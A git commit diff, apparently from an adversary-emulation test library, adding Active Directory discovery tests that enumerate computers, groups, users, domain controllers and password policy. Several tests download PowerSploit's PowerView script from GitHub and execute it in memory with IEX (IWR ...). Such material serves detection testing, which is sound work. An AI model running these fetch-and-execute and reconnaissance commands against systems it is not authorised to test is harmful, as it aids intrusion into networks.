AD Enumeration - user/groups, pw policy (#1807)

* More AD * fix conflict resolution mistake * add powershell Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
2022-03-14 11:32:18 -06:00
parent 4c019a8936
commit 687da9235b
4 changed files with 90 additions and 3 deletions
@@ -310,6 +310,18 @@ atomic_tests:
        Write-Host $Computer}
    name: powershell
    elevation_required: false
+- name: Enumerate Active Directory Computers with Get-AdComputer
+  description: |
+    The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+    Upon successful execution a listing of Computers will output with their paths in AD.
+    Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      Get-AdComputer -Filter *
 - name: Enumerate Active Directory Computers with ADSISearcher
  auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
  description: |
@@ -322,4 +334,26 @@ atomic_tests:
    name: powershell
    elevation_required: false
    command: |
-      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+      ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+- name: Get-DomainController with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+    name: powershell
+- name: Get-wmiobject to Enumerate Domain Controllers
+  description: |
+    The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+    Upon successful execution a listing of Systems from AD will output with their paths.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-wmiobject -class ds_computer -namespace root\directory\ldap
@@ -133,6 +133,17 @@ atomic_tests:
    command: |
      #{adfind_path} -f (objectcategory=group)
    name: command_prompt
+- name: Enumerate Active Directory Groups with Get-AdGroup
+  description: |
+    The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+    Upon successful execution a listing of groups will output with their paths in AD.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    command: |
+      Get-AdGroup -Filter *
 - name: Enumerate Active Directory Groups with ADSISearcher
  auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
  description: |
@@ -182,4 +193,14 @@ atomic_tests:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
-    name: powershell
+    name: powershell 
+- name: Get-DomainGroup with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainGroup to identify the domain groups. Upon execution, Groups within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+    name: powershell 
@@ -214,6 +214,17 @@ atomic_tests:
    elevation_required: false
    command: |
      Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
+
+- name: Get-DomainUser with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+    name: powershell
 - name: Enumerate Active Directory Users with ADSISearcher
  auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
  description: |
@@ -85,4 +85,25 @@ atomic_tests:
  executor:
    command: pwpolicy getaccountpolicies
    name: bash
-
+- name: Get-DomainPolicy with PowerView
+  description: |
+    Utilizing PowerView, run Get-DomainPolicy to return the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+    name: powershell
+- name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+  description: |
+    The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+    Upon successful execution a listing of the policy implemented will display.
+    Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+  supported_platforms:
+  - windows
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      get-addefaultdomainpasswordpolicy